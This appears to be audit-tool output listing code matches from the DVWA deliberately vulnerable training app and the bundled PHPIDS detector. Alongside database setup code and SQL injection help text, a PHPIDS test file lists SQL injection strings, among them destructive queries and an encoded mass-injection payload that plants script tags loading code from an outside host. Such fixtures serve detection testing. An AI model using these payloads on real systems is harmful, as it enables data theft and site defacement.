./dvwa/includes/dvwaPage.inc.php:547 (26/29) OK | Dubious | Bad | Hide
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:10 (27/29) OK | Dubious | Bad | Hide
7-*/
8-
9-// Connect to server
10:if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11-	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
./dvwa/includes/DBMS/PGSQL.php:34 (28/29) OK | Dubious | Bad | Hide
31-
32-
33-// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/DBMS.php:84 (29/29) OK | Dubious | Bad | Hide
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}

database (26) Top | Hide

./config/config.inc.php:3 (1/26) OK | Dubious | Bad | Hide
2-
3:# If you are having problems connecting to the MySQL database and all of the variables below are correct
4-# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
5-# Thanks to digininja for the fix.
6-
./config/config.inc.php:16 (2/26) OK | Dubious | Bad | Hide
13-
14-$_DVWA = array();
15-$_DVWA[ 'db_server' ] = 'localhost';
16:$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18-$_DVWA[ 'db_password' ] = '';
19-
./vulnerabilities/sqli_blind/help/help.php:9 (3/26) OK | Dubious | Bad | Hide
6-	<tr>
7-	<td><div id="code">
8-
9:		<p>When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. 
10-		Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, 
11-		they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data 
12-		by asking a series of True and False questions through SQL statements.</p>
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/sqli/help/help.php:10 (4/26) OK | Dubious | Bad | Hide
7-	<td><div id="code">
8-
9-		<p>A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. 
10:		A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database 
11-		(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a 
12-		type of  injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. </p>
13-		
14-		<p>The 'id' variable within this PHP script is vulnerable to SQL injection.</p>
15-		
16:		<p>There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!</p>
17-		
18-		<p>If you have received a Magicquotes error, turn them off in php.ini.</p>
19-
./vulnerabilities/xss_s/help/help.php:17 (5/26) OK | Dubious | Bad | Hide
14-		Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with 
15-		that site. These scripts can even rewrite the content of the HTML page. </p>
16-		
17:		<p>The XSS payload is stored in the database. The XSS is permanent until the database is reset or the payload is manually deleted.</p>
18-		
19-	</div></td>
20-	</tr>
./external/phpids/0.6/docs/examples/cakephp/ids.php:182 (6/26) OK | Dubious | Bad | Hide
179-
180-    /**
181-     * This function writes an entry about the intrusion
182:     * to the intrusion database
183-     *
184-     * @param array $results
185-     * @return boolean
./external/phpids/0.6/tests/IDS/MonitorTest.php:731 (7/26) OK | Dubious | Bad | Hide
728-        $exploits[] = "abc' = !0 != !!!'0";
729-        $exploits[] = "abc' = !+0 != !'0 ";
730-        $exploits[] = "aa'=+'1";
731:        $exploits[] = "';if 1=1 drop database test-- -a";
732-        $exploits[] = "';if 1=1 drop table users-- -a";
733-        $exploits[] = "';if 1=1 shutdown-- -a";
734-        $exploits[] = "'; while 1=1 shutdown-- -a";
./external/phpids/0.6/lib/IDS/Caching/Database.php:40 (8/26) OK | Dubious | Bad | Hide
37- * Needed SQL:
38- *
39-
40:    #create the database
41-
42-    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
./external/phpids/0.6/lib/IDS/Caching/Database.php:59 (9/26) OK | Dubious | Bad | Hide
56-/**
57- * Database caching wrapper
58- *
59: * This class inhabits functionality to get and set cache via a database.
60- *
61- * @category  Security
62- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Caching/Database.php:106 (10/26) OK | Dubious | Bad | Hide
103-    /**
104-     * Constructor
105-     *
106:     * Connects to database.
107-     *
108-     * @param string $type caching type
109-     * @param array  $init the IDS_Init object
./external/phpids/0.6/lib/IDS/Caching/Database.php:139 (11/26) OK | Dubious | Bad | Hide
136-    }
137-
138-    /**
139:     * Writes cache data into the database
140-     *
141-     * @param array $data the caching data
142-     *
./external/phpids/0.6/lib/IDS/Caching/Database.php:202 (12/26) OK | Dubious | Bad | Hide
199-    }
200-
201-    /**
202:     * Connect to database and return a handle
203-     *
204-     * @return object dbh
205-     * @throws PDOException if a db error occurred
./external/phpids/0.6/lib/IDS/Caching/Database.php:238 (13/26) OK | Dubious | Bad | Hide
235-    /**
236-     * Write the cache data to the table
237-     * 
238:     * @param object $handle the database handle
239-     * @param array  $data   the caching data
240-     * 
241-     * @return object dbh
./external/phpids/0.6/lib/IDS/Log/Database.php:61 (14/26) OK | Dubious | Bad | Hide
58-/**
59- * Database logging wrapper
60- *
61: * The database wrapper is designed to store reports into an sql database. It 
62- * implements the singleton pattern and is based in PDO, supporting 
63: * different database types.
64- *
65- * @category  Security
66- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Log/Database.php:131 (15/26) OK | Dubious | Bad | Hide
128-     * Instance container
129-     *
130-     * Due to the singleton pattern this class allows to initiate only one instance
131:     * for each database wrapper.
132-     *
133-     * @var array
134-     */
./external/phpids/0.6/lib/IDS/Log/Database.php:239 (16/26) OK | Dubious | Bad | Hide
236-    }
237-
238-    /**
239:     * Stores given data into the database
240-     *
241-     * @param object $data IDS_Report instance
242-     *
./setup.php:21 (17/26) OK | Dubious | Bad | Hide
18-		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21:		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );
22-		dvwaPageReload();
23-	}
24-
./setup.php:32 (18/26) OK | Dubious | Bad | Hide
29-<div class=\"body_padded\">
30-	<h1>Database setup <img src=\"".DVWA_WEB_PAGE_TO_ROOT."dvwa/images/spanner.png\"></h1>
31-
32:	<p>Click on the 'Create / Reset Database' button below to create or reset your database. If you get an error make sure you have the correct user credentials in /config/config.inc.php</p>
33-
34:	<p>If the database already exists, it will be cleared and the data will be reset.</p>
35-
36-	<br />
37-
./dvwa/includes/dvwaPage.inc.php:526 (19/26) OK | Dubious | Bad | Hide
523-
524-$DBMS_connError = '<div align="center">
525-		<img src="'.DVWA_WEB_PAGE_TO_ROOT.'dvwa/images/logo.png">
526:		<pre>Unable to connect to the database.<br>'.$DBMS_errorFunc.'<br /><br /></pre>
527:		Click <a href="'.DVWA_WEB_PAGE_TO_ROOT.'setup.php">here</a> to setup the database.
528-		</div>';
529-
530-function dvwaDatabaseConnect() {
./dvwa/includes/dvwaPage.inc.php:539 (20/26) OK | Dubious | Bad | Hide
536-	if ($DBMS == 'MySQL') {
537-
538-		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
539:		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
540-			die( $DBMS_connError );
541-		}
542-
./dvwa/includes/dvwaPage.inc.php:547 (21/26) OK | Dubious | Bad | Hide
544-	
545-	elseif ($DBMS == 'PGSQL') {
546-
547:		$dbconn = pg_connect("host=".$_DVWA[ 'db_server' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ])
548-		or die( $DBMS_connError );
549-
550-	}
./dvwa/includes/DBMS/PGSQL.php:5 (22/26) OK | Dubious | Bad | Hide
2-
3-/*
4-
5:This file contains all of the code to setup the initial PostgreSQL database. (setup.php)
6-
7-*/
8-
9-// Connect to server
10-if ( !@pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) ) {
11:	dvwaMessagePush( "Could not connect to the database - please check the config file." );
12-	dvwaPageReload();
13-}
14-
15:// Create database
16-$drop_db = "DROP DATABASE IF EXISTS dvwa;";
17-
18-if( !@pg_query($drop_db) ) {
19:	dvwaMessagePush( "Could not drop existing database<br />SQL: " . pg_last_error() );
20-	dvwaPageReload();
21-}
22-
23-$create_db = "CREATE DATABASE dvwa;";
24-
25-if( !@pg_query ( $create_db ) ) {
26:	dvwaMessagePush( "Could not create database<br />SQL: " . pg_last_error() );
27-	dvwaPageReload();
28-}
29-
30-dvwaMessagePush( "Database has been created." );
31-
32-
33:// Connect to server AND connect to the database
34:$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]);
35-	
36-	
37-// Create table 'users'
./dvwa/includes/DBMS/DBMS.php:5 (23/26) OK | Dubious | Bad | Hide
2-
3-/*
4-
5:This file contains all of the database management code for DVWA.
6:All code related to database management should be kept in here.
7-
8-*/
9-
./dvwa/includes/DBMS/DBMS.php:67 (24/26) OK | Dubious | Bad | Hide
64-
65-$DBMS_connError = '<div align="center">
66-		<img src="'.DVWA_WEB_PAGE_TO_ROOT.'dvwa/images/logo.png">
67:		<pre>Unable to connect to the database.<br>'.$DBMS_errorFunc.'<br /><br /></pre>
68:		Click <a href="'.DVWA_WEB_PAGE_TO_ROOT.'setup.php">here</a> to setup the database.
69-		</div>';
70-		
71-function dvwaDatabaseConnect() {
./dvwa/includes/DBMS/DBMS.php:78 (25/26) OK | Dubious | Bad | Hide
75-
76-	if ($DBMS == 'MySQL') {
77-		if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] )
78:		|| !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
79-			die( $DBMS_connError );
80-		}
81-	}
82-	
83-	elseif ($DBMS == 'PGSQL') {
84:		$dbconn = @pg_connect("host=".$_DVWA[ 'db_server' ]." port=".$_DVWA[ 'db_port' ]." dbname=".$_DVWA[ 'db_database' ]." user=".$_DVWA[ 'db_user' ]." password=".$_DVWA[ 'db_password' ]) 
85-		or die( $DBMS_connError );
86-	}
87-}
./dvwa/includes/DBMS/MySQL.php:5 (26/26) OK | Dubious | Bad | Hide
2-
3-/*
4-
5:This file contains all of the code to setup the initial MySQL database. (setup.php)
6-
7-*/
8-
9-if( !@mysql_connect( $_DVWA[ 'db_server' ], $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ] ) ) {
10:	dvwaMessagePush( "Could not connect to the database - please check the config file." );
11-	dvwaPageReload();
12-}
13-
14:// Create database
15-$drop_db = "DROP DATABASE IF EXISTS dvwa;";
16-if( !@mysql_query ( $drop_db ) ) {
17:	dvwaMessagePush( "Could not drop existing database<br />SQL: ".mysql_error() );
18-	dvwaPageReload();
19-}
20-
21-$create_db = "CREATE DATABASE dvwa;";
22-
23-if( !@mysql_query ( $create_db ) ) {
24:	dvwaMessagePush( "Could not create database<br />SQL: ".mysql_error() );
25-	dvwaPageReload();
26-}
27-
28-dvwaMessagePush( "Database has been created." );
29-
30-// Create table 'users'
31:if( !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) {
32:	dvwaMessagePush( 'Could not connect to database.' );
33-	dvwaPageReload();
34-}
35-

MD5 (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:908 (1/1) OK | Dubious | Bad | Hide
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908:        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";

SHA1 (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:908 (1/1) OK | Dubious | Bad | Hide
906-        $exploits[] = "asd' union distinct(select null,password,null from users)--a ";
907-        $exploits[] = "asd' union distinct ( select null,password,(null)from user )-- a ";
908:        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911-        $exploits[] = "0x31 union select @@version,username,password from users ";